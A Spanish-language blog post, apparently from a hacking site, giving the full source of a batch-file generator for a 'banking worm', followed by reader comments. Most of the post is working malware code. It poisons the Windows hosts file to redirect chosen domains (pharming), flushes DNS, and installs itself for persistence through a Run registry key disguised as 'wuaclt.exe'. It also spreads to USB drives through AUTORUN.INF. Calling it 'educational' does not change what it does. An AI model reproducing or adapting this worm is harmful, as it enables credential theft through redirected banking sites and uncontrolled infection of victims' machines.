Script
Generador de Gusano bancario ( Pharming ) Batch
Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )
Código 100% Educativo para demostrar únicamente la facilidad en que un atacante puede afectarnos realizando este tipo de técnicas en nuestra contra.
setlocal EnableDelayedExpansion
color A
cls
title b4nking-w0rm by Octalh [ www.aztekmindz.org ]
echo.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo _ _ __ __ _ _
echo /\ ^| ^| ^| ^| ^| \/ ^(_^) ^| ^|
echo / \ ___^| ^|_ ___^| ^| __ ^| \ / ^|_ _ __ __^| ^|____
echo / /\ \ ^|_ / __/ _ \ ^|/ / ^| ^|\/^| ^| ^| ‘_ \ / _` ^|_ /
echo / ____ \ / /^| ^|^| __/ ^< ^| ^| ^| ^| ^| ^| ^| ^| (_^| ^|/ /
echo /_/ \_\/___^|\__\___^|_^|\_\ ^|_^| ^|_^|_^|_^| ^|_^|\__,_/___^|
echo.
echo www.aztekmindz.org octalh@gmail.com
echo.
echo – Generador de Gusano bancario ^( Pharming ^) Batch
echo – Testeado XP SP2
echo – Programado con fines educativos
echo – El autor no se hace responsable de
echo usos malintencionados.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
echo.
set /P nombre= [1] Ingrese nombre del gusano:
::header
echo @echo off >%nombre%.bat
echo :: + [ b4nking-worm ] + >>%nombre%.bat
echo :: www.aztekmindz.org octalh@gmail.com >>%nombre%.bat
echo :: – Generador Gusano bancario – >>%nombre%.bat
::copiado
echo COPY %%0 "%WINDIR%\%nombre%.bat" >>%nombre%.bat
echo.
set /P ch= [2] Ingrese cantidad de hosts a ingresar:
echo.
echo [3] Ingrese la IP y el host separados por un espacio:
echo Ejemplo: 127.0.0.1 localhost
echo.
echo SET htxt=C:\WINDOWS\system32\drivers\etc\hosts >>%nombre%.bat
echo IF EXIST %%htxt%% ( >>%nombre%.bat
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
FOR /L %%i IN (1,1,%ch%) DO (
::Host
echo [ Almacenando Host %%i de %ch% ]
set /P hs= Host:
echo echo !hs! ^>^>%%htxt%% >>%nombre%.bat
)
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
echo ) >>%nombre%.bat
echo ipconfig /flushdns >>%nombre%.bat
echo.
set /p ai= [4] Activar Autoinicio? S/N:
if %ai%==s (
::Autoinicio
echo REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\%nombre%.bat" /f >> %nombre%.bat
)
echo.
set /p usb= [5] Activar Propagacion USB? S/N:
if %usb%==s (
::USB
echo :inicio >>%nombre%.bat
echo FOR %%%%A IN ^(D F G H I J K L M N O P Q R S T U V W X Y Z^) DO CALL :verificar %%%%A >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :verificar >>%nombre%.bat
echo IF EXIST "%%1:" ^(CALL :copiado %%1^) >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :copiado >>%nombre%.bat
echo COPY %nombre%.bat "%%1:\145782.bat" >>%nombre%.bat
echo echo [AUTORUN] ^> "%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1=abrir ^>^>"%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2=explorar ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shellexecute= "\%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo ping -n 10 localhost >>%nombre%.bat
echo GOTO :inicio >>%nombre%.bat
)
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo [OK] Gusano editado con exito
echo.
echo Presione cualquier tecla para salir
echo.
echo +-+-+-+-+-+ +-+-+-+-+-+
echo ^|A^|z^|t^|e^|k^| ^|M^|i^|n^|d^|z^|
echo +-+-+-+-+-+ +-+-+-+-+-+
echo – www.aztekmindz.org ^| octalh@gmail.com -
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
pause>nul
Descargar Programa y herramientas utiles 
Comentarios
7 comments para “Generador de Gusano bancario ( Pharming ) Batch”
Deja un comentario
esta buenaza esa man con esa man soy de peru man
he-man (?)
Lorena soy hombre xD, salu2
donde esta no lo encuentro…..si pudieras en lo posible de actualizar lo pliz
Me parece que selo han cargado, bueno supongo que para los que saben eso no es problema, para los demas… esperen a ver si dicen como generar el editor partiendo del codigo fuente
O tienes un virus o un antivirus
intento comprender que es lo que hace el archivo por lotes pero no me queda claro.. entiendo que este es un bat que crea otros dos archivos un bat y un autorun el autorun es para la propagacion en usb vdd…
y el otro hace que se ejecute cada vex que enciende la pc
pero no me queda claro para que agregar direcciones al archivo
C:\WINDOWS\system32\drivers\etc\hosts
para qque que efecto produce le agradeceria qu me lo explicaran soy nuevo visitando esta pagina y bueno me gustan algunos lenguajwes de programacion pero sin ser un guru en ello… xfavor se los agradecere si se toman el tiempo para responder mi duda
No mamen, ahori si que no mamen, jajajaja esa jalada de BAT pero esto si se llevo el premio mayor a la mamada del año “…b4nking-worm…” jajajaja
Niños, mejor lean, cultiven su mente, estudien, aprendan nuevas cosas y despues viene a publicar sus “…b4nking-worm…” jajaja sorry lo tenia que ponder otra vez, jajaja
Ok… no publiquen pendejada y media que desarrollen en BAT pff… jajaja no se como una bola de SK hacen estas web’s jajaja
Nos vemos bola de tarados, ahh y una recomenación… la proxima vez hagan algo que valga la pena y que trascienda les recomiendo C++ o Java, de perdido Visual Basic! pero BAT, por favor!